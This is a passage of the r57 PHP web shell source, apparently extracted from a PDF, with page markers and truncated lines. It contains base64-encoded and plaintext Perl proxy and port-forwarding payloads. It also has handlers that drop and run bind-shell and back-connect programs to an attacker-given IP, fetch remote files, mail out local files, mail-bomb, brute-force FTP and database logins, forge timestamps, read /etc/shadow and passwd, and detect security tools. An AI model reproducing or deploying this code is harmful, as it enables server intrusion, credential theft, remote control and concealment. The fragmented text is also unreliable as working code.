A9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgKCR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0gc3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbGUgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs

ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";

/* ?ST SATIRIN KIRILMI? HAL? *//*

#!/usr/bin/perluse IO::Socket;use POSIX;$localport = $ARGV[0];$host = $ARGV[1];

$port = $ARGV[2];$daemon=1;$DIR = undef;$| = 1;if ($daemon){ $pid = fork; exit if $pid; die "$!" unless defined($pid); POSIX::setsid() or die "$!"; }%o = ('port' => $localport,'toport' => $port,'tohost' => $host);$ah = IO::Socket::INET->new('LocalPort' => $localport,'Reuse' => 1,'Listen' => 10) || die "$!";$SIG{'CHLD'} = 'IGNORE';$num = 0;while (1) {$ch = $ah->accept(); if (!$ch) { print STDERR "$!\n"; next; }

++$num;$pid = fork();if (!defined($pid)) { print STDERR "$!\n"; }elsif ($pid == 0) { $ah->close(); Run(\%o, $ch, $num); }else { $ch->close(); }}sub Run {my($o, $ch, $num) = @_;my $th = IO::Socket::INET->new('PeerAddr' => $o->{'tohost'},'PeerPort' => $o->{'toport'});if (!$th) { exit 0; }my $fh;if ($o->{'dir'}) { $fh = Symbol::gensym(); open($fh, ">$o->{'dir'}/tunnel$num.lo

g") or die "$!"; }$ch->autoflush();$th->autoflush();while ($ch || $th) {my $rin = "";vec($rin, fileno($ch), 1) = 1 if $ch;vec($rin, fileno($th), 1) = 1 if $th;my($rout, $eout);select($rout = $rin, undef, $eout = $rin, 120);if (!$rout && !$eout) {}

5/21/2018 r57

37/72

my $cbuffer = "";my $tbuffer = "";if ($ch && (vec($eout, fileno($ch), 1) || vec($rout, fileno($ch), 1))) {my $result = sysread($ch, $tbuffer, 1024);if (!defined($result)) {print STDERR "$!\n";exit 0;}if ($result == 0) { exit 0; }}if ($th && (vec($eout, fileno($th), 1) || vec($rout, fileno($th), 1))) {

my $result = sysread($th, $cbuffer, 1024);if (!defined($result)) { print STDERR "$!\n"; exit 0; }if ($result == 0) {exit 0;}}if ($fh && $tbuffer) {(print $fh $tbuffer);}while (my $len = length($tbuffer)) {my $res = syswrite($th, $tbuffer, $len);if ($res > 0) {$tbuffer = substr($tbuffer, $res);}else {print STDERR "$!\n";}}while (my $len = length($cbuffer)) {my $res = syswrite($ch, $cbuffer, $len);if ($res > 0) {$cbuffer = substr($cbuffer, $res);}

else {print STDERR "$!\n";}}}}

*/

$prx_pl="IyF1c3IvYmluL3BlcmwKdXNlIFNvY2tldDsKbXkgJHBvcnQgPSAkQVJHVlswXXx8MzEzMzc7Cm15ICRwcm90b2NvbCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsKbXkgJG15X2FkZHIgID0gc29ja2FkZHJfaW4gKCRwb3J0LCBJTkFERFJfQU5ZKTsKc29ja2V0IChTT0NLLCBBRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvY29sKSBvciBkaWUgInNvY2tldCgpOiAkISI7CnNldHNvY2tvcHQgKFNPQ0ssIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwxICkgb3IgZGllICJzZXRzb2Nrb3B0KCk6ICQhIjsKYmluZCAoU09DSywgJG15X2FkZHIpIG9yIGRp

ZSAiYmluZCgpOiAkISI7Cmxpc3RlbiAoU09DSywgU09NQVhDT05OKSBvciBkaWUgImxpc3RlbigpOiAkISI7CiRTSUd7J0lOVCd9ID0gc3ViIHsKY2xvc2UgKFNPQ0spOwpleGl0Owp9Owp3aGlsZSAoMSkgewpuZXh0IHVubGVzcyBteSAkcmVtb3RlX2FkZHIgPSBhY2NlcHQgKFNFU1NJT04sIFNPQ0spOwpteSAoJGZpc3QsICRtZXRob2QsICRyZW1vdGVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IGFuYWx5emVfcmVxdWVzdCgpOwppZihvcGVuX2Nvbm5lY3Rpb24gKFJFTU9URSwgJHJlbW90ZV9ob3N0LCAkcmVtb3RlX3BvcnQpID09IDApIHsKY2xvc2UgKFNFU1NJT04pOwpuZXh0Owp9CnByaW50IFJFTU9URSAkZmlyc3Q7CnByaW50IFJFTU9URSAiVXNlci1BZ2VudDogR29vZ2xlYm90LzIuMSAoK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbClcbiI7CndoaWxlICg8U0VTU0lPTj4pIHsKbmV4dCBpZiAoL1Byb3h5LUNvbm5lY3Rpb246LyB8fCAvVXNlci1BZ2VudDovKTsKcHJpbnQgUkVNT1RFICRfOwpsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvK

TsKfQpwcmludCBSRU1PVEUgIlxuIjsKJGhlYWRlciA9IDE7CndoaWxlICg8UkVNT1RFPikgewpwcmludCBTRVNTSU9OICRfOwppZiAoJGhlYWRlcikgeyAgICAgCmlmICgkaGVhZGVyICYmICRfID1+IC9eW1xzXHgwMF0qJC8pIHsKJGhlYWRlciA9IDA7Cn0KfQp9CmNsb3NlIChSRU1PVEUpOwpjbG9zZSAoU0VTU0lPTik7Cn0KY2xvc2UgKFNPQ0spOwpzdWIgYW5hbHl6ZV9yZXF1ZXN0IHsKbXkgKCRmaXN0LCAkdXJsLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCwgJG1ldGhvZCk7CiRmaXJzdCA9IDxTRVNTSU9OPjsKJHVybCA9ICgkZmlyc3QgPX4gbXwoaHR0cDovL1xTKyl8KVswXTsKKCRtZXRob2QsICRyZW1vdGVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IAooJGZpcnN0ID1+IG0hKEdFVCkgaHR0cDovLyhbXi86XSspOj8oXGQqKSEgKTsKaWYgKCEkcmVt

5/21/2018 r57

38/72

b3RlX2hvc3QpIHsKY2xvc2UoU0VTU0lPTik7CmV4aXQ7Cn0KJHJlbW90ZV9wb3J0ID0gImh0dHAiIHVubGVzcyAoJHJlbW90ZV9wb3J0KTsKJGZpcnN0ID1+IHMvaHR0cDpcL1wvW15cL10rLy87CnJldHVybiAoJGZpcnN0LCAkbWV0aG9kLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7Cn0Kc3ViIG9wZW5fY29ubmVjdGlvbiB7Cm15ICgkaG9zdCwgJHBvcnQpID0gQF9bMSwyXTsKbXkgKCRkZXN0X2FkZHIsICRjdXIpOwppZiAoJHBvcnQgIX4gL15cZCskLykgewokcG9ydCA9IChnZXRzZXJ2YnluYW1lKCRwb3J0LCAidGNwIikpWzJdOwokcG9ydCA9IDgwIHVubGVzcyAoJHBvcnQpOwp9CiRob3N0ID0gaW5ldF9hdG9uICgkaG9zdCkgb3IgcmV0dXJuIDA7CiRkZXN0X2FkZHIgPSBzb2NrYWRkcl9pbiAoJHBvcnQsICRob3N0KTsKc29ja2V0ICgkX1swXSwgQUZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90b2NvbCkgb3IgZGllICJzb2NrZXQoKSA6ICQhIjsKY29

ubmVjdCAoJF9bMF0sICRkZXN0X2FkZHIpIG9yIHJldHVybiAwOwokY3VyID0gc2VsZWN0KCRfWzBdKTsgIAokfCA9IDE7CnNlbGVjdCgkY3VyKTsKcmV0dXJuIDE7Cn0=";

/* ?ST SATIRIN KIRILMI? HAL? *//*

#!usr/bin/perluse Socket;my $port = $ARGV[0]||31337;my $protocol = getprotobyname('tcp');my $my_addr = sockaddr_in ($port, INADDR_ANY);socket (SOCK, AF_INET, SOCK_STREAM, $protocol) or die "socket(): $!";

setsockopt (SOCK, SOL_SOCKET, SO_REUSEADDR,1 ) or die "setsockopt(): $!";bind (SOCK, $my_addr) or die "bind(): $!";listen (SOCK, SOMAXCONN) or die "listen(): $!";$SIG{'INT'} = sub {close (SOCK);exit;};while (1) {next unless my $remote_addr = accept (SESSION, SOCK);my ($fist, $method, $remote_host, $remote_port) = analyze_request();if(open_connection (REMOTE, $remote_host, $remote_port) == 0) {close (SESSION);next;

}print REMOTE $first;print REMOTE "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";while () {next if (/Proxy-Connection:/ || /User-Agent:/);print REMOTE $_;last if ($_ =~ /^[\s\x00]*$/);}print REMOTE "\n";$header = 1;while () {print SESSION $_;if ($header) {

if ($header && $_ =~ /^[\s\x00]*$/) {$header = 0;}}}close (REMOTE);close (SESSION);}close (SOCK);sub analyze_request {

5/21/2018 r57

39/72

my ($fist, $url, $remote_host, $remote_port, $method);$first = ;$url = ($first =~ m|(http://\S+)|)[0];($method, $remote_host, $remote_port) =($first =~ m!(GET) http://([^/:]+):?(\d*)! );if (!$remote_host) {close(SESSION);exit;}$remote_port = "http" unless ($remote_port);$first =~ s/http:\/\/[^\/]+//;

return ($first, $method, $remote_host, $remote_port);}sub open_connection {my ($host, $port) = @_[1,2];my ($dest_addr, $cur);if ($port !~ /^\d+$/) {$port = (getservbyname($port, "tcp"))[2];$port = 80 unless ($port);}$host = inet_aton ($host) or return 0;$dest_addr = sockaddr_in ($port, $host);socket ($_[0], AF_INET, SOCK_STREAM, $protocol) or die "socket() : $!";connect ($_[0], $dest_addr) or return 0;

$cur = select($_[0]);$| = 1;select($cur);return 1;}

*/

if($unix){if(!isset($_COOKIE['uname'])) {$uname = ex('uname -a');setcookie('uname',$uname);}else {$uname = $_COOKIE['uname'];}

if(!isset($_COOKIE['id'])) {$id = ex('id');setcookie('id',$id);}else {$id = $_COOKIE['id'];}if($safe_mode) {$sysctl = '-';}else if(isset($_COOKIE['sysctl'])) {$sysctl = $_COOKIE['sysctl'];}else{$sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');if(empty($sysctl)) {$sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease');}if(empty($sysctl)) {$sysctl = '-';}setcookie('sysctl',$sysctl);}}

echo $head;echo '';echo ''.ws(2).'r57 shell '.$version.'';echo ws(2)."".date ("d-m-Y H:i:s")." Your IP: [".gethostbyname($_SERVER["REMOTE_ADDR"])."]";if(isset($_SERVER['X_FORWARDED_FOR'])){echo " X_FORWARDED_FOR: [".$_SERVER['X_FORWARDED_FOR']."]";}

5/21/2018 r57

40/72

if(isset($_SERVER['CLIENT_IP'])){echo " CLIENT_IP: [".$_SERVER['CLIENT_IP']."]";}echo " Server IP: [".gethostbyname($_SERVER["HTTP_HOST"])."]";echo "
";echo ws(2)."PHP version: ".@phpversion()."";$curl_on = @function_exists('curl_version');echo ws(2);echo "cURL: ".(($curl_on)?("ON"):("Kapali"));

echo "".ws(2);echo "MySQL: ";$mysql_on = @function_exists('mysql_connect');if($mysql_on){echo "ON";}else {echo "Kapali";}echo "".ws(2);echo "MSSQL: ";$mssql_on = @function_exists('mssql_connect');if($mssql_on){echo "ON";}else{echo "Kapali";}echo "".ws(2);echo "PostgreSQL: ";$pg_on = @function_exists('pg_connect');

if($pg_on){echo "ON";}else{echo "Kapali";}echo "".ws(2);echo "Oracle: ";$ora_on = @function_exists('ocilogon');if($ora_on){echo "ON";}else{echo "Kapali";}echo "
".ws(2);echo "Safe_mode: ";echo (($safe_mode)?("ON"):("Kapali"));echo "".ws(2);echo "Open_basedir: ";

if($open_basedir) {if (''==($df=@ini_get('open_basedir'))) {echo "ini_get disable!";}else {echo "$df";};}else {echo "NONE";}echo ws(2)."Safe_mode_exec_dir: ";if(@function_exists('ini_get')) {if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "NONE";}else {echo "$df";};}else {echo "ini_get disable!";}echo ws(2)."Safe_mode_include_dir: ";if(@function_exists('ini_get')) {if (''==($df=@ini_get('safe_mode_include_dir'))) {echo "NONE";}else {echo "$df";};}

else {echo "ini_get disable!";}echo "
".ws(2);echo "Disable functions : ";$df='ini_get disable!';if((@function_exists('ini_get')) &&(''==($df=@ini_get('disable_functions')))){echo "NONE";}else{echo "$df";}$free = @diskfreespace($dir);if (!$free) {$free = 0;}$all = @disk_total_space($dir);if (!$all) {$all = 0;}

5/21/2018 r57

41/72

echo "
".ws(2)."Free space : ".view_size($free)." Total space: ".view_size($all)."";$ust='';if($unix &&!$safe_mode){if (which('gcc')) {$ust.="gcc,";}if (which('cc')) {$ust.="cc,";}if (which('ld')) {$ust.="ld,";}if (which('php')) {$ust.="php,";}if (which('perl')) {$ust.="perl,";}if (which('python')) {$ust.="python,";}if (which('ruby')) {$ust.="ruby,";}

if (which('make')) {$ust.="make,";}if (which('tar')) {$ust.="tar,";}if (which('nc')) {$ust.="netcat,";}if (which('locate')) {$ust.="locate,";}if (which('suidperl')) {$ust.="suidperl,";}}if (@function_exists('pcntl_exec')) {$ust.="pcntl_exec,";}if($ust){echo "
".ws(2).$lang[$language.'_text137'].": ".$ust."";}$ust='';if($unix &&!$safe_mode){if (which('kav')) {$ust.="kav,";}if (which('nod32')) {$ust.="nod32,";}

if (which('bdcored')) {$ust.="bitdefender,";}if (which('uvscan')) {$ust.="mcafee,";}if (which('sav')) {$ust.="symantec,";}if (which('drwebd')) {$ust="drwebd,";}if (which('clamd')) {$ust.="clamd,";}if (which('rkhunter')) {$ust.="rkhunter,";}if (which('chkrootkit')) {$ust.="chkrootkit,";}if (which('iptables')) {$ust.="iptables,";}if (which('ipfw')) {$ust.="ipfw,";}if (which('tripwire')) {$ust.="tripwire,";}if (which('shieldcc')) {$ust.="stackshield,";}if (which('portsentry')) {$ust.="portsentry,";}if (which('snort')) {$ust.="snort,";}

if (which('ossec')) {$ust.="ossec,";}if (which('lidsadm')) {$ust.="lidsadm,";}if (which('tcplodg')) {$ust.="tcplodg,";}if (which('tripwire')) {$ust.="tripwire,";}if (which('sxid')) {$ust.="sxid,";}if (which('logcheck')) {$ust.="logcheck,";}if (which('logwatch')) {$ust.="logwatch,";}}if (@function_exists('apache_get_modules') &&@in_array('mod_security',apache_get

_modules())) {$ust.="mod_security,";}if($ust){echo "
".ws(2).$lang[$language.'_text138'].": $ust";}echo "
".ws(2)."";

echo ws(2).$lb." phpinfo ".$rb;echo ws(2).$lb." php.ini ".$rb;echo ws(2).$lb." cpu ".$rb;echo ws(2).$lb." mem ".$rb;if(!$unix) {echo ws(2).$lb."

5/21/2018 r57

42/72

nguage.'_text50']."\">systeminfo ".$rb;}else{echo ws(2).$lb." syslog ".$rb;echo ws(2).$lb." resolv ".$rb;echo ws(2).$lb." hosts ".$rb;echo ws(2).$lb." shadow ".$rb;echo ws(2).$lb." passwd ".$rb;}echo ws(2).$lb." tmp ".$rb;echo ws(2).$lb." delete ".$rb;if($unix &&!$safe_mode){echo "
".ws(2)."";echo ws(2).$lb." procinfo ".$rb;echo ws(2).$lb." version ".$rb;

echo ws(2).$lb." free ".$rb;echo ws(2).$lb." dmesg ".$rb;echo ws(2).$lb." vmstat ".$rb;echo ws(2).$lb." lspci ".$rb;echo ws(2).$lb." lsdev ".$rb;echo ws(2).$lb." interrupts ".$rb;echo ws(2).$lb." realise1 ".$rb;echo ws(2).$lb." realise2 ".$rb;echo ws(2).$lb." lsattr ".$rb;echo "
".ws(2)."";echo ws(2).$lb." w ".$rb;echo ws(2).$lb." who
".$rb;echo ws(2).$lb." uptime ".$rb;echo ws(2).$lb." last ".$rb;echo ws(2).$lb." ps aux ".$rb;echo ws(2).$lb." service ".$rb;echo ws(2).$lb." ifconfig ".$rb;echo ws(2).$lb." netstat ".$rb;echo ws(2).$lb."

5/21/2018 r57

43/72

fstab ".$rb;echo ws(2).$lb." fdisk ".$rb;echo ws(2).$lb." df-h ".$rb;}echo '';echo $font;if($unix){

echo 'uname -a :'.ws(1).'
sysctl :'.ws(1).'
$OSTYPE :'.ws(1).'
Server :'.ws(1).'
id :'.ws(1).'
pwd :'.ws(1).'
';echo "";echo "";echo((!empty($uname))?(ws(3).@substr($uname,0,120)."
"):(ws(3).@substr(@php_uname(),0,120)."
"));echo ws(3).$sysctl."
";echo ws(3).ex('echo $OSTYPE')."
";echo ws(3).@substr($SERVER_SOFTWARE,0,120)."
";if(!empty($id)) {echo ws(3).$id."
";}else if(@function_exists('posix_geteuid') &&@function_exists('posix_getegid') &&@function_exists('posix_getgrgid') &&@function_exists('posix_getpwuid'))

{$euserinfo = @posix_getpwuid(@posix_geteuid());$egroupinfo = @posix_getgrgid(@posix_getegid());echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )
';}else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."
";echo ws(3).$dir;echo ws(3).'( '.perms(@fileperms($dir)).' )';echo "";}else

{echo 'OS :'.ws(1).'
Server :'.ws(1).'
User :'.ws(1).'
pwd :'.ws(1).'
';echo "";echo "";echo ws(3).@substr(@php_uname(),0,120)."
";echo ws(3).@substr($SERVER_SOFTWARE,0,120)."
";echo ws(3).@getenv("USERNAME")."
";echo ws(3).$dir;echo "
";}echo "";echo "";

if(!empty($_POST['cmd']) &&$_POST['cmd']=="mail"){$res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");err(6+$res);$_POST['cmd']="";}if(!empty($_POST['cmd']) &&$_POST['cmd']=="mail_file"&&!empty($_POST['loc_file'])){

5/21/2018 r57

44/72

if($file=@fopen($_POST['loc_file'],"r")){$filedump = @fread($file,@filesize($_POST['loc_file']));@fclose($file);}else if ($file=readzlib($_POST['loc_file'])) {$filedump = $file;}else {err(1,$_POST['loc_file']);$_POST['cmd']="";}if(isset($_POST['cmd'])){$filename = @basename($_POST['loc_file']);$content_encoding=$mime_type='';compress($filename,$filedump,$_POST['compress']);$attach = array("name"=>$filename,

"type"=>$mime_type,"content"=>$filedump);if(empty($_POST['subj'])) {$_POST['subj'] = 'file from r57';}if(empty($_POST['from'])) {$_POST['from'] = '[email protected]';}$res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);err(6+$res);$_POST['cmd']="";}}if(!empty($_POST['cmd']) &&$_POST['cmd']=="mail_bomber"&&!empty($_POST['mail_flood']) &&!empty($_POST['mail_size'])){

for($h=1;$h

5/21/2018 r57

45/72

2,$_POST['mk_name']);$_POST['cmd']="";}else {@fclose($file);$_POST['e_name'] = $_POST['mk_name'];$_POST['cmd']="edit_file";echo "".$lang[$language.'_text61']."";}}else if($_POST['action'] == "delete")

{if(unlink($_POST['mk_name'])) echo "".$lang[$language.'_text63']."";$_POST['cmd']="";}break;case 'dir':if($_POST['action'] == "create"){if(@mkdir($_POST['mk_name'])){$_POST['cmd']="";echo "".$lang[$language.'_text62']."";}else {err(2,$_POST['mk_name']);$_POST['cmd']="";}}else if($_POST['action'] == "delete"){if(@rmdir($_POST['mk_name'])) echo "".$lang[$language.'_text64']."";$_POST['cmd']="";}break;}

}if(!empty($_POST['cmd']) &&$_POST['cmd']=="touch"){if(!$_POST['file_name_r']){$datar = $_POST['day']." ".$_POST['month']." ".$_POST['year']." ".$_POST['chasi']." hours ".$_POST['minutes']." minutes ".$_POST['second']." seconds";$datar = @strtotime($datar);@touch($_POST['file_name'],$datar,$datar);}else{@touch($_POST['file_name'],@filemtime($_POST['file_name_r']),@filemtime($_POST['file_name_r']));}

$_POST['cmd']="";}if(!empty($_POST['cmd']) &&$_POST['cmd']=="edit_file"&&!empty($_POST['e_name'])){if(!$file=@fopen($_POST['e_name'],"r+")) {$filedump = @fread($file,@filesize($_POST['e_name']));@fclose($file);$only_read = 1;}if($file=@fopen($_POST['e_name'],"r")) {$filedump = @fread($file,@filesize($_POST['e_name']));@fclose($file);}else if ($file=readzlib($_POST['e_name'])) {$filedump = $file;$only_read = 1;}else {err(1,$_POST['e_name']);$_POST['cmd']="";}

5/21/2018 r57

46/72

if(isset($_POST['cmd'])){echo $table_up3;echo $font;echo "";echo ws(3)."".$_POST['e_name']."";echo "";echo @htmlspecialchars($filedump);echo "";echo "";echo "";

echo "";echo (!empty($only_read)?("

".$lang[$language.'_text44']):("

"));echo "";echo "";echo "";echo "";exit();}}if(!empty($_POST['cmd']) &&$_POST['cmd']=="save_file"){$mtime = @filemtime($_POST['e_name']);

if((!$file=@fopen($_POST['e_name'],"w")) &&(!function_exists('file_put_contents'))) {err(0,$_POST['e_name']);}else {if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);@fwrite($file,$_POST['e_text']) or @fputs($file,$_POST['e_text']) or @file_put_contents($_POST['e_name'],$_POST['e_text']);@touch($_POST['e_name'],$mtime,$mtime);$_POST['cmd']="";echo "".$lang[$language.'_text45']."";}}

if (!empty($_POST['proxy_port'])&&($_POST['use']=="Perl")){cf("/tmp/prxpl",$prx_pl);$p2=which("perl");$blah = ex($p2." /tmp/prxpl ".$_POST['proxy_port']." &");$_POST['cmd']="ps -aux | grep prxpl";}if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")){cf("/tmp/bd.c",$port_bind_bd_c);$blah = ex("gcc -o /tmp/bd /tmp/bd.c");@unlink("/tmp/bd.c");$blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");

$_POST['cmd']="ps -aux | grep bd";}if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")){cf("/tmp/bdpl",$port_bind_bd_pl);$p2=which("perl");$blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");$_POST['cmd']="ps -aux | grep bdpl";}

5/21/2018 r57

47/72

if (!empty($_POST['ip']) &&!empty($_POST['port']) &&($_POST['use']=="Perl")){cf("/tmp/back",$back_connect);$p2=which("perl");$blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");$_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";}if (!empty($_POST['ip']) &&!empty($_POST['port']) &&($_POST['use']=="C")){cf("/tmp/back.c",$back_connect_c);

$blah = ex("gcc -o /tmp/backc /tmp/back.c");@unlink("/tmp/back.c");$blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");$_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";}if (!empty($_POST['local_port']) &&!empty($_POST['remote_host']) &&!empty($_POST['remote_port']) &&($_POST['use']=="Perl")){cf("/tmp/dp",$datapipe_pl);$p2=which("perl");$blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");

$_POST['cmd']="ps -aux | grep dp";}if (!empty($_POST['local_port']) &&!empty($_POST['remote_host']) &&!empty($_POST['remote_port']) &&($_POST['use']=="C")){cf("/tmp/dpc.c",$datapipe_c);$blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");@unlink("/tmp/dpc.c");$blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");$_POST['cmd']="ps -aux | grep dpc";}if (!empty($_POST['alias']) &&isset($aliases[$_POST['alias']])) {$_POST['cmd'] =

$aliases[$_POST['alias']];}for($upl=0;$upl

5/21/2018 r57

48/72

if($w_file){@fwrite($w_file,$datafile) or @fputs($w_file,$datafile) or @file_put_contents($_POST['loc_file'],$datafile);@fclose($w_file);}}$_POST['cmd'] = '';break;case 'wget':$_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."

";break;case 'fetch':$_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";break;case 'lynx':$_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";break;case 'links':$_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";

break;case 'GET':$_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";break;case 'curl':$_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";break;}}if(!empty($_POST['cmd']) &&(($_POST['cmd']=="ftp_file_up") ||($_POST['cmd']=="ftp_file_down"))){

list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);if(empty($ftp_port)) {$ftp_port = 21;}$connection = @ftp_connect ($ftp_server,$ftp_port,10);if(!$connection) {err(3);}else{if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) {err(4);}else{if($_POST['cmd']=="ftp_file_down") {if(chop($_POST['loc_file'])==$dir) {$_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']);}@ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);}

if($_POST['cmd']=="ftp_file_up") {@ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);}}}@ftp_close($connection);$_POST['cmd'] = "";}if(!empty($_POST['cmd']) &&(($_POST['cmd']=="ftp_brute") ||($_POST['cmd']=="db_brute"))){

5/21/2018 r57

49/72

if($_POST['cmd']=="ftp_brute"){list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);if(empty($ftp_port)) {$ftp_port = 21;}$connection = @ftp_connect ($ftp_server,$ftp_port,10);}else if($_POST['cmd']=="db_brute"){$connection = 1;}if(!$connection) {err(3);$_POST['cmd'] = "";}else if(($_POST['brute_method']=='passwd') &&(!$users=get_users('/etc/passwd'))){echo "".$lang[$

language.'_text96']."";$_POST['cmd'] = "";}else if(($_POST['brute_method']=='dic') &&(!$users=get_users($_POST['dictionary']))){echo "Can\'t get password list";$_POST['cmd'] = "";}if($_POST['cmd']=="ftp_brute"){@ftp_close($connection);}}echo $table_up3;if (empty($_POST['cmd']) &&!$safe_mode &&!$open_basedir) {$_POST['cmd']=(!$unix)?("dir"):("ls -lia");}else if(empty($_POST['cmd']) &&($safe_mode ||$open_basedir)){$_POST['cmd']="safe

_dir";}echo $font.$lang[$language.'_text1'].": ".$_POST['cmd']."";if($safe_mode ||$open_basedir){switch($_POST['cmd']){case 'safe_dir':$d=@dir($dir);if ($d){while (false!==($file=$d->read())){if ($file=="."||$file=="..") continue;@clearstatcache();

@list ($dev,$inode,$inodep,$nlink,$uid,$gid,$inodev,$size,$atime,$mtime,$ctime,$bsize) = stat($file);if(!$unix){echo date("d.m.Y H:i",$mtime);if(@is_dir($file)) echo " ";else printf("% 7s ",$size);}else{if(@function_exists('posix_getpwuid')){$owner = @posix_getpwuid($uid);$grgid = @posix_getgrgid($gid);}else{$owner['name']=$grgid['name']='';}echo $inode." ";echo perms(@fileperms($file));

@printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);echo date("d.m.Y H:i ",$mtime);}echo "$file\n";}$d->close();}else if(@function_exists('glob')){function eh($errno,$errstr,$errfile,$errline)

5/21/2018 r57

50/72

{global $D,$c,$i;preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/",$errstr,$o);if($o){$D[$c] = $o[2];$c++;}}$error_reporting = @ini_get('error_reporting');error_reporting(E_WARNING);@ini_set("display_errors",1);$root = "/";if($dir) $root = $dir;

$c = 0;$D = array();@set_error_handler("eh");$chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";for($i=0;$i

5/21/2018 r57

51/72

case 'test2':@include($_POST['test2_file']);break;case 'test3':if(empty($_POST['test3_port'])) {$_POST['test3_port'] = "3306";}$db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);if($db){if(@mysql_select_db($_POST['test3_md'],$db)){

@mysql_query("DROP TABLE IF EXISTS temp_r57_table");@mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )");@mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");$r = @mysql_query("SELECT * FROM temp_r57_table");while(($r_sql = @mysql_fetch_array($r))) {echo @htmlspecialchars($r_sql[0])."\r\n";}@mysql_query("DROP TABLE IF EXISTS temp_r57_table");}else echo "[-] ERROR! Can't select database";@mysql_close($db);}else echo "[-] ERROR! Can't connect to mysql server";

